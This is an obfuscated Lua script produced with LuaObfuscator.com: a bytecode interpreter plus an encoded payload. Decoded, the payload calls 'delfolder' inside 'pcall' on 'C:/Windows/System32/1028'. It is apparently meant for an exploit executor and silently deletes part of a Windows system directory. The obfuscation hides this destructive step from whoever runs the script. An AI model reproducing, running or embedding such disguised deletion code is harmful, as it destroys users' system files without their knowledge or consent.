--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v111=0;local v112;while true do if (v111==0) then v112=v5(v89,v19);v19=nil;v111=1;end if (v111==1) then return v112;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((1 + 1)^(v32-1)))%((1 + 1)^(((v33-(2 -(2 -1))) -(v32-(2 -1))) + (1 -0))) ;return v90-(v90%(2 -1)) ;else local v91=619 -((1025 -470) + 64) ;local v92;while true do if (v91==(931 -(857 + 74))) then v92=(570 -(367 + 45 + 156))^(v32-(118 -((989 -(892 + 65)) + (155 -70)))) ;return (((v31%(v92 + v92))>=v92) and (928 -((564 -(87 + 263)) + (893 -(67 + 113))))) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v36 * (189 + 67)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;return (v40 * 16777216) + (v39 * ((128432 + 48012) -110908)) + (v38 * (464 -208)) + v37 ;end local function v24() local v41=997 -(915 + 82) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==1) then v44=2 -1 ;v45=(v20(v43,1 + 0 ,26 -(24 -18) ) * ((2 + 0)^32)) + v42 ;v41=1189 -(1069 + 118) ;end if (v41==3) then if (v46==(0 -0)) then if (v45==0) then return v47 * (0 -(0 -0)) ;else local v121=0 + 0 ;while true do if (v121==(0 -(0 -0))) then v46=1 + (859 -(814 + 45)) ;v44=791 -(368 + 423) ;break;end end end elseif (v46==(6433 -4386)) then return ((v45==(0 -0)) and (v47 * (((2 + 17) -(10 + 3 + 5))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1465 -(416 + (911 -(261 + 624)))) ) * (v44 + (v45/((6 -4)^((40 -17) + 29)))) ;end if (v41==(3 -1)) then v46=v20(v43,459 -(145 + 293) ,461 -(44 + 386) );v47=((v20(v43,1518 -(998 + 488) )==(1 + 0)) and  -((1081 -(1020 + 60)) + 0)) or (773 -(201 + 571)) ;v41=1141 -(116 + 1022) ;end if (v41==0) then v42=v23();v43=v23();v41=1;end end end local function v25(v48) local v49;if  not v48 then local v93=0;while true do if (v93==(1423 -(630 + (2729 -1936)))) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -((1751 -(760 + 987)) -(1916 -(1789 + 124))) );v18=v18 + v48 ;local v50={};for v66=1 + 0 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 700 -(271 + 429) ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v103~=(0 + 0)) then else v94=(function() return 1500 -(1408 + 92) ;end)();v95=(function() return nil;end)();v103=(function() return 122 -(17 + 104) ;end)();end if (v103~=(1289 -(993 + 295))) then else local v118=(function() return 0;end)();while true do if ((0 -0)~=v118) then else while true do if (v94==0) then v95=(function() return v96();end)();if (v97(v95, #":", #" ")==(1171 -(418 + 753))) then local v133=(function() return 0 + 0 ;end)();local v134=(function() return;end)();local v135=(function() return;end)();local v136=(function() return;end)();while true do if (v133~=2) then else if (v97(v135, #" ", #"!")~= #":") then else v136[2 + 0 ]=(function() return v100[v136[3 -1 ]];end)();end if (v97(v135,2,1 + 1 )== #"<") then v136[ #"nil"]=(function() return v100[v136[ #"19("]];end)();end v133=(function() return 4 -1 ;end)();end if (v133~=(1 + 0)) then else local v150=(function() return 0;end)();local v151=(function() return;end)();while true do if (v150~=(529 -(406 + 123))) then else v151=(function() return 0 + 0 ;end)();while true do if (v151==(1637 -(1373 + 263))) then v133=(function() return 2;end)();break;end if (v151==(1000 -(451 + 549))) then local v160=(function() return 0 + 0 ;end)();while true do if ((1 + 0)~=v160) then else v151=(function() return 1 -0 ;end)();break;end if (v160~=0) then else v136=(function() return {v98(),v98(),nil,nil};end)();if (v134==(1145 -(466 + 679))) then local v161=(function() return 0 -0 ;end)();local v162=(function() return;end)();while true do if (v161~=(0 -0)) then else v162=(function() return 0;end)();while true do if (v162==(0 -0)) then v136[ #"xnx"]=(function() return v98();end)();v136[ #"?id="]=(function() return v98();end)();break;end end break;end end elseif (v134== #"]") then v136[ #"-19"]=(function() return v99();end)();elseif (v134==2) then v136[ #"nil"]=(function() return v99() -((1902 -(106 + 1794))^(1400 -(746 + 638))) ;end)();elseif (v134== #"91(") then local v167=(function() return 0;end)();local v168=(function() return;end)();while true do if (v167~=(0 + 0)) then else v168=(function() return 0 -0 ;end)();while true do if (v168==0) then v136[ #"xnx"]=(function() return v99() -((343 -(218 + 123))^(43 -27)) ;end)();v136[ #"0313"]=(function() return v98();end)();break;end end break;end end end v160=(function() return 1582 -(1535 + 46) ;end)();end end end end break;end end end if (v133==(3 + 0)) then if (v97(v135, #"91(", #"19(")~= #"{") then else v136[ #"?id="]=(function() return v100[v136[ #"http"]];end)();end v101[v102]=(function() return v136;end)();break;end if (v133~=(584 -(57 + 527))) then else local v153=(function() return 0;end)();while true do if ((1428 -(41 + 1386))~=v153) then else v133=(function() return 1;end)();break;end if (v153~=0) then else v134=(function() return v97(v95,1 + 1 , #"-19");end)();v135=(function() return v97(v95, #"?id=",6);end)();v153=(function() return 561 -(306 + 254) ;end)();end end end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end end end end end;end)();local v52=(function() return function(v104,v105,v106) local v107=(function() return 0;end)();local v108=(function() return;end)();while true do if (v107==(0 + 0)) then v108=(function() return 0 -0 ;end)();while true do if (v108==(1467 -(899 + 568))) then local v124=(function() return 0 + 0 ;end)();while true do if ((0 -0)~=v124) then else v104[v105-#"}" ]=(function() return v106();end)();return v104,v105,v106;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #":",v57 do local v69=(function() return 290 -(60 + 230) ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==(573 -(426 + 146))) then v72=(function() return nil;end)();while true do if (v70~=0) then else local v122=(function() return 166 -(122 + 44) ;end)();while true do if (v122==1) then v70=(function() return 1;end)();break;end if (v122~=(0 + 0)) then else local v125=(function() return 1456 -(282 + 1174) ;end)();while true do if (v125==(811 -(569 + 242))) then v71=(function() return v21();end)();v72=(function() return nil;end)();v125=(function() return 1;end)();end if (v125~=(3 -2)) then else v122=(function() return 2 -1 ;end)();break;end end end end end if (v70~=(1 + 0)) then else if (v71== #"[") then v72=(function() return v21()~=(0 + 0) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71~= #"asd") then else v72=(function() return v25();end)();end v58[v68]=(function() return v72;end)();break;end end break;end if (v69==(0 + 0)) then local v113=(function() return 1024 -(706 + 318) ;end)();while true do if ((1252 -(721 + 530))~=v113) then else v69=(function() return 1272 -(945 + 326) ;end)();break;end if ((0 -0)~=v113) then else v70=(function() return 0 -0 ;end)();v71=(function() return nil;end)();v113=(function() return 1 + 0 ;end)();end end end end end v56[ #"19("]=(function() return v21();end)();for v73= #"~",v23() do FlatIdent_940A0,Descriptor,v21,v20,v22,v23,v58,v53,v73=(function() return v51(FlatIdent_940A0,Descriptor,v21,v20,v22,v23,v58,v53,v73);end)();end for v74= #"~",v23() do v54,v74,v28=(function() return v52(v54,v74,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1259 -(1043 + 214) ];local v65=v60[11 -8 ];return function(...) local v75=v63;local v76=v64;local v77=v65;local v78=v27;local v79=1;local v80= -(1213 -(323 + (1990 -1101)));local v81={};local v82={...};local v83=v12("#",...) -(581 -(361 + 219)) ;local v84={};local v85={};for v109=320 -(16 + 37 + 267) ,v83 do if (v109>=v77) then v81[v109-v77 ]=v82[v109 + 1 + 0 ];else v85[v109]=v82[v109 + 1 ];end end local v86=(v83-v77) + (414 -(15 + 398)) ;local v87;local v88;while true do local v110=982 -(18 + 964) ;while true do if ((v110==(0 -0)) or (3151<1284)) then v87=v75[v79];v88=v87[1 + 0 ];v110=1 + 0 ;end if ((v110==(851 -(20 + 830))) or (1850==1529)) then if (v88<=(4 + 1)) then if ((821<2123) and (v88<=2)) then if (v88<=((608 -482) -(116 + 10))) then v85[v87[1 + 1 ]]=v87[741 -(542 + 196) ];elseif (v88==(1 -0)) then v85[v87[2]]=v62[v87[756 -(239 + 514) ]];else v85[v87[1 + 1 ]]=v62[v87[2 + 1 ]];end elseif ((902<2325) and (v88<=3)) then do return;end elseif (v88>4) then v85[v87[2]]=v29(v76[v87[2 + 1 + 0 ]],nil,v62);else local v142=v87[2];v85[v142](v85[v142 + 1 ]);end elseif (v88<=(20 -(1341 -(797 + 532)))) then if ((858<=2962) and (v88<=(15 -9))) then local v129=1551 -(1126 + 425) ;local v130;while true do if (v129==(405 -(86 + 32 + 287))) then v130=v87[7 -5 ];v85[v130]=v85[v130](v85[v130 + (1122 -(40 + 78 + 1003)) ]);break;end end elseif (v88==(20 -13)) then local v143=377 -(142 + 235) ;local v144;while true do if (v143==(0 -0)) then v144=v87[1 + 1 ];v85[v144]=v85[v144](v85[v144 + (978 -(553 + (996 -572))) ]);break;end end else local v145=0;local v146;while true do if (v145==0) then v146=v87[3 -(1203 -(373 + 829)) ];v85[v146](v85[v146 + 1 + (731 -(476 + 255)) ]);break;end end end elseif (v88<=(9 + (1130 -(369 + 761)))) then v85[v87[2 + 0 ]]=v87[2 + 1 ];elseif (v88>(6 + 3 + 1)) then do return;end else v85[v87[(6 -2) -2 ]]=v29(v76[v87[3]],nil,v62);end v79=v79 + (2 -1) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!013Q0003053Q007063612Q6C00043Q0012023Q00013Q00020A00016Q00063Q000200022Q00033Q00013Q00013Q00023Q0003093Q0064656C666F6C64657203183Q00433A2F57696E646F77732F53797374656D33322F3130323800043Q0012023Q00013Q001209000100024Q00083Q000200012Q00033Q00017Q00",v9(),...);
